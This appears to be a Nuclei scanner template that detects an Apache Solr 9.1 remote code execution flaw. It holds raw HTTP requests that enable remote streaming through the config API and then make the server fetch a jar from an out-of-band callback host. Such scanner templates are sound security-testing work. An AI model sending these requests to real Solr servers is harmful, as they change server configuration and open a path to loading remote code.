id: apache-solr-rce

info:
  name: Apache Solr 9.1 - Remote Code Execution
  author: j4vaovo
  severity: critical
  reference:
    - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
  metadata:
    max-request: 2
  tags: APACHE-Solr

http:
  - raw:
      - |
        POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
      - |
        POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9

        --------------------------5897997e44b07bf9
        Content-Disposition: form-data; name="stream.url"

        jar:http://{{interactsh-url}}/test.jar?!/Test.class
        --------------------------5897997e44b07bf9--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"

# digest: 4b0a00483046022100aa0bcb8b8fab709829c6a6cee46c4917d09e27f39e608a658587c7e3f02d57ef02210092446ef738a0c2b004ab98113f4c23e1357b91524bdc8a95e93e787d92bdb4a6:922c64590222798bb761d5b6d8e72950
